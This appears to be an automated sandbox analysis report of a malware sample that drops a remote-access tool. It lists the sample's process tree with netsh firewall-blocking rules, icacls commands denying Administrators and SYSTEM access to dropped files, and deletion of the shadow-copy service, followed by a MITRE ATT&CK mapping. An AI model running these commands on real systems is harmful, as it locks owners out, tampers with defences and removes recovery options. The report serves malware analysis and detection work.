    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
        5⤵
        
        PID:4936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
      4⤵
      PID:4748
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
        5⤵
        
        PID:2744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
      4⤵
      PID:5028
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
        5⤵
        
        PID:4744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
      4⤵
      PID:4624
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
        5⤵
        
        PID:4448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
      4⤵
      PID:5032
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
        5⤵
        
        PID:4496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
      4⤵
      PID:4868
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
        5⤵
        
        PID:4468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
      4⤵
      PID:4732
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
        5⤵
        
        PID:4824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
      4⤵
      PID:4484
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
        5⤵
        
        PID:5024
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
      4⤵
      PID:4208
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
        5⤵
        
        PID:4944
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
      4⤵
      PID:2040
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
        5⤵
        
        PID:4480
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
      4⤵
      PID:1492
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
        5⤵
        
        PID:4796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
      4⤵
      PID:4800
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
        5⤵
        
        PID:4312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
      4⤵
      PID:4100
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
        5⤵
        
        PID:5080
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
      4⤵
      PID:4316
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
        5⤵
        
        PID:4164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
      4⤵
      PID:4424
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
        5⤵
        
        PID:4352
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
      4⤵
      PID:4392
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
        5⤵
        
        PID:4876
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
      4⤵
      PID:4476
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
        5⤵
        
        PID:4784
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
      4⤵
      PID:4256
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
        5⤵
        
        PID:4180
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
      4⤵
      PID:4460
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
        5⤵
        
        PID:2024
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
      4⤵
      PID:492
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
        5⤵
        
        PID:4372
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4548
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:4700
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4604
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:4280
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4736
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4564
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:4740
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4684
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:4752
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4848
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:816
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4120
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:4364
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:912
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
      4⤵
      PID:2240
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4440
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:4376
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:1432
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    PID:1832

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3444
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:2432
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:2412

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:3780

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:2024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:8

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2164-35-0x0000000002E80000-0x0000000002E81000-memory.dmp

Filesize
4KB

Download
memory/2164-36-0x0000000003680000-0x0000000003681000-memory.dmp

Filesize
4KB

Download
memory/2164-37-0x0000000002E80000-0x0000000002E81000-memory.dmp

Filesize
4KB

Download
memory/2388-56-0x00000000035E0000-0x00000000035E1000-memory.dmp

Filesize
4KB

Download
memory/2388-55-0x0000000002DE0000-0x0000000002DE1000-memory.dmp

Filesize
4KB

Download